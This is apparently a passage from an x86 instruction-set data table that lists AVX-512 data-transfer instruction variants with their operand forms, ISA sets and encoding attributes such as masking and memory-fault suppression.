VMOVSHDUP 
VMOVSHDUP_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3854 VMOVSHDUP VMOVSHDUP_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 3855 VMOVSHDUP VMOVSHDUP_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3856 VMOVSHDUP VMOVSHDUP_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 3857 VMOVSHDUP VMOVSHDUP_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3858 VMOVSHDUP VMOVSHDUP_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 3861 VPMOVSDW VPMOVSDW_YMMi16_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3862 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3863 VPMOVSDW VPMOVSDW_XMMi16_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3864 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3865 VPMOVSDW VPMOVSDW_XMMi16_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3866 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3897 VPMOVZXWQ VPMOVZXWQ_ZMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3898 VPMOVZXWQ VPMOVZXWQ_ZMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3899 VPMOVZXWQ VPMOVZXWQ_XMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3900 VPMOVZXWQ VPMOVZXWQ_XMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3901 
VPMOVZXWQ VPMOVZXWQ_YMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3902 VPMOVZXWQ VPMOVZXWQ_YMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3937 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3938 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3939 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3940 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3941 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3942 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3962 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3963 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3964 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3965 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3966 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3967 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3968 VPMOVUSQD VPMOVUSQD_YMMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3969 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_ZMMu64_AVX512 
DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3970 VPMOVUSQD VPMOVUSQD_XMMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3971 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3972 VPMOVUSQD VPMOVUSQD_XMMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3973 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3980 VPMOVSXDQ VPMOVSXDQ_ZMMi64_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3981 VPMOVSXDQ VPMOVSXDQ_ZMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3982 VPMOVSXDQ VPMOVSXDQ_XMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3983 VPMOVSXDQ VPMOVSXDQ_XMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3984 VPMOVSXDQ VPMOVSXDQ_YMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3985 VPMOVSXDQ VPMOVSXDQ_YMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4027 VMOVDDUP VMOVDDUP_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4028 VMOVDDUP VMOVDDUP_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX 4029 VMOVDDUP VMOVDDUP_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4030 VMOVDDUP VMOVDDUP_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX 4031 VMOVDDUP VMOVDDUP_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4032 VMOVDDUP 
VMOVDDUP_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX 4045 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4046 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4047 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4048 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4049 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4050 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4051 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4052 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4053 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4054 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4055 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4056 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4242 VPMOVD2M VPMOVD2M_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES: 4243 VPMOVD2M VPMOVD2M_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES: 4244 VPMOVD2M VPMOVD2M_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES: 4260 VPMOVSXBQ 
VPMOVSXBQ_ZMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4261 VPMOVSXBQ VPMOVSXBQ_ZMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4262 VPMOVSXBQ VPMOVSXBQ_XMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4263 VPMOVSXBQ VPMOVSXBQ_XMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4264 VPMOVSXBQ VPMOVSXBQ_YMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4265 VPMOVSXBQ VPMOVSXBQ_YMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4284 VPMOVZXBD VPMOVZXBD_ZMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4285 VPMOVZXBD VPMOVZXBD_ZMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4286 VPMOVZXBD VPMOVZXBD_XMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4287 VPMOVZXBD VPMOVZXBD_XMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4288 VPMOVZXBD VPMOVZXBD_YMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4289 VPMOVZXBD VPMOVZXBD_YMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4314 VPMOVB2M VPMOVB2M_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: 4315 VPMOVB2M VPMOVB2M_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: 4316 VPMOVB2M VPMOVB2M_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: 4356 VMOVSLDUP VMOVSLDUP_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4357 VMOVSLDUP VMOVSLDUP_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER 
AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 4358 VMOVSLDUP VMOVSLDUP_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4359 VMOVSLDUP VMOVSLDUP_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 4360 VMOVSLDUP VMOVSLDUP_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4361 VMOVSLDUP VMOVSLDUP_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 4375 VPMOVSXBW VPMOVSXBW_XMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 4376 VPMOVSXBW VPMOVSXBW_XMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4377 VPMOVSXBW VPMOVSXBW_YMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 4378 VPMOVSXBW VPMOVSXBW_YMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4379 VPMOVSXBW VPMOVSXBW_ZMMi16_MASKmskw_YMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 4380 VPMOVSXBW VPMOVSXBW_ZMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4422 VPMOVZXBQ VPMOVZXBQ_ZMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4423 VPMOVZXBQ VPMOVZXBQ_ZMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4424 VPMOVZXBQ VPMOVZXBQ_XMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4425 VPMOVZXBQ VPMOVZXBQ_XMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4426 VPMOVZXBQ VPMOVZXBQ_YMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4427 VPMOVZXBQ 
VPMOVZXBQ_YMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4494 VPMOVW2M VPMOVW2M_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: 4495 VPMOVW2M VPMOVW2M_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: 4496 VPMOVW2M VPMOVW2M_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: 4539 VPMOVM2W VPMOVM2W_XMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: 4540 VPMOVM2W VPMOVM2W_YMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: 4541 VPMOVM2W VPMOVM2W_ZMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: 4560 VPMOVM2B VPMOVM2B_XMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: 4561 VPMOVM2B VPMOVM2B_YMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: 4562 VPMOVM2B VPMOVM2B_ZMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: 4577 VPMOVM2D VPMOVM2D_XMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES: 4578 VPMOVM2D VPMOVM2D_YMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES: 4579 VPMOVM2D VPMOVM2D_ZMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES: 4605 VMOVLHPS VMOVLHPS_XMMf32_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: 4671 VPMOVZXBW VPMOVZXBW_XMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 4672 VPMOVZXBW VPMOVZXBW_XMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4673 VPMOVZXBW VPMOVZXBW_YMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 4674 VPMOVZXBW VPMOVZXBW_YMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4675 VPMOVZXBW VPMOVZXBW_ZMMi16_MASKmskw_YMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 4676 VPMOVZXBW 
VPMOVZXBW_ZMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4696 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4697 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4698 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4699 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4700 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4701 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4717 VPMOVSQD VPMOVSQD_YMMi32_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4718 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4719 VPMOVSQD VPMOVSQD_XMMi32_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4720 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4721 VPMOVSQD VPMOVSQD_XMMi32_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4722 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4723 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4724 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4725 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_XMMi64_AVX512 
DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4726 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4727 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4728 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4735 VPMOVWB VPMOVWB_XMMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 4736 VPMOVWB VPMOVWB_MEMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4737 VPMOVWB VPMOVWB_XMMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 4738 VPMOVWB VPMOVWB_MEMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4739 VPMOVWB VPMOVWB_YMMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 4740 VPMOVWB VPMOVWB_MEMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4862 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 4863 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4864 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 4865 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4866 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 4867 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4868 VMOVDQU8 
VMOVDQU8_YMMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 4869 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4870 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 4871 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4872 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 4873 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: 